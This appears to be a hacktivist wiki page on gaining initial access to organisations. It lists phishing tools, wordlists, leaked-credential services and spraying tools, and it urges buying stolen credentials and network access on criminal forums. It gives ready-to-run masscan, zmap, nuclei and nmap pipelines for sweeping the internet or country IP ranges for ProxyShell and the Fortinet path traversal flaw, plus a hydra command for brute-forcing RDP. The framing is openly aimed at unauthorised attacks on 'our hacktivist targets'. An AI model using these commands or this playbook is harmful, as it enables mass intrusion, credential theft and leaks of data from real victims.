Initial Access Tactics, techniques and procedures
Phishing
Phishing is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.
Tools
- https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
- https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
- https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
- https://www.xanthus.io/mastering-the-simulated-phishing-attack
- https://github.com/Arno0x/EmbedInHTML
- https://github.com/L4bF0x/PhishingPretexts
- http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
- https://book.hacktricks.xyz/phishing-methodology
- https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
- https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
- https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
- https://getgophish.com/ Be sure to remove the identifying headers gophish adds
- https://github.com/curtbraz/PhishAPI
- https://github.com/edoverflow/can-i-take-over-xyz
- https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
- Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | remove the identifying headers gophish adds
- Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office
Password Attacks
Groups like Lapsus$ show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of Uber, Rockstar games, Okta and so on then they will work on our hacktivist targets!
If your target uses multi-factor authentication you can try either social engineering or MFA fatigue.
Usernames
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.
- https://github.com/digininja/CeWL
- https://github.com/Mebus/cupp
- https://github.com/digininja/RSMangler
- https://github.com/sc0tfree/mentalist
- https://github.com/urbanadventurer/username-anarchy
- https://github.com/vysecurity/LinkedInt
- https://github.com/initstring/linkedin2username
- https://github.com/shroudri/username_generator
Passwords
Common and leaked credentials to test login portals and network services.
Default passwords
- https://cirt.net/passwords
- https://default-password.info
- https://datarecovery.com/rd/default-passwords
- https://github.com/ihebski/DefaultCreds-cheat-sheet
Common and leaked passwords
- https://wiki.skullsecurity.org/index.php?title=Passwords
- https://github.com/danielmiessler/SecLists/tree/master/Passwords
- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
- https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists
Password cracking tools
- https://github.com/byt3bl33d3r/SprayingToolkit
- https://www.kali.org/tools/hydra
- https://www.kali.org/tools/brutespray
- https://www.kali.org/tools/medusa
- https://www.kali.org/tools/patator
- https://github.com/1N3/BruteX
Searching leaks
- https://github.com/khast3x/h8mail [Free but includes paid services]
Services
Please note: DO NOT use intelx[.]io as they have been seen doxing hackers in the past and block the use of Tor. AVOID!
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.
- https://haveibeenpwned.com
- https://exposed.lol
- https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
- https://dehashed.com [Paid. Accepts crypto (BTC)]
Once your leaks have been downloaded you can parse your results in the format, e-mail:pass.
Password spraying
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords (Spring2023) and spray them hoping an employee uses a weak and guessable credential.
- https://github.com/dafthack/MSOLSpray
- https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
- https://github.com/blacklanternsecurity/TREVORspray
- https://github.com/knavesec/CredMaster
- https://github.com/xFreed0m/RDPassSpray
- https://github.com/dafthack/MailSniper
Hash cracking
Crack password hashes using both online and offline tools!
Identify hash
Online tools
- https://hashes.com/en/decrypt/hash [Free & Paid]
- https://crackstation.net
Offline tools
- https://github.com/hashcat/hashcat
- https://github.com/openwall/john
- https://github.com/NotSoSecure/password_cracking_rules
Buying access
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
- https://xss.is (Tor)
- https://exploit.in [Paid] (Tor)
- https://ramp4u.io [Free & Paid] (Tor)
Spray and pray
As seen by Guacamaya, hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See scanning and recon for tools such as nuclei and the nmap scripting engine (NSE) to then vulnerability scan the IP addresses you discover.
Networks
Vulnerability Scanning
We can use a vulnerability scanning spray and pray technique on publicly facing applications to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on new and old CVE vulnerabilities that are commonly exploited.
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.
If the output from the scans is too large, then you can use the split command to break the output file up into smaller files and scan against those via multiple screen windows/sessions to make your scanning more efficient.
split -l 10000 results.txt results_
IP Ranges:
- List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
- CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
- Scan the entire internet: 0.0.0.0/0
Proxyshell
Tool: masscan
1. Scan for Proxyshell:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
sed -i 's/$/:443/' results.txt
nuclei -l results.txt -t nuclei-templates/http/cves/2021/CVE-2021-34473.yaml -o vulns.txt
Exploit Discovered hosts: Proxyshell
CVE-2018-13379
2. Scan for CVE-2018-13379:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p4443,10443,8443 --open-only --excludefile block.txt --output-format list --output-file results.txt
awk '{ print $4 ":" $3 }' results.txt > final_results.txt
nuclei -l final_results.txt -t nuclei-templates/http/cves/2018/CVE-2018-13379.yaml -o vulns.txt
Exploit Discovered hosts: Fortinet SSL VPN Path Traversal
Tool: zmap
1. Scan for Microsoft Exchange E-mail Servers:
sudo zmap -q -p 443 | httpx -silent -s -sd -location \ > | awk '/owa/ { print substr($1,9) }' > owa.txt
2. Vulnerability scan discovered hosts for Proxyshell using NSE
nmap -p 443 -Pn -n \ > --script http-vuln-exchange-proxyshell.nse -iL owa.txt
Domains
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.
See Domain Spray and Pray scanning.
Password Attacks
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.
RDP
1. Remote Desktop (RDP) Brute forcing:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p3389 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
hydra -L usernames.txt -P passwords.txt -M targets.txt -t 16 rdp -o results
VPN
2. Virtual Private Network (VPN) Brute forcing:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p10443,443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
- To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing